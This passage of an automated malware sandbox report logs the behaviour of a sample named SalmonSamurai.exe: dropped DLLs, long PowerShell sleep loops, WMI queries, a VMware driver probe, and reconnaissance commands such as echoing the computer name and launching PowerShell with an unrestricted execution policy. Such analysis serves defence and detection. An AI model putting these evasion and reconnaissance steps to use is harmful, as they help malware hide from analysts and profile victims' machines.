Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4395
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2557
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 595
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4407
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6289
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3215
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1370
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 984
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 818
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 928
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 4395 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 3980 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep count: 152 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5576Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep count: 3646 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 1647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep count: 1104 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep count: 1320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 2557 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 595 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep count: 937 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264Thread sleep count: 1104 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 5342 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 4407 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep count: 6289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep count: 3215 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 1370 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 960Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 984 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 1318 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep count: 1401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1552Thread sleep count: 818 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 1530 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1788Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep count: 928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted
Source: SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: VMware can crash with older drivers and WebGL content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
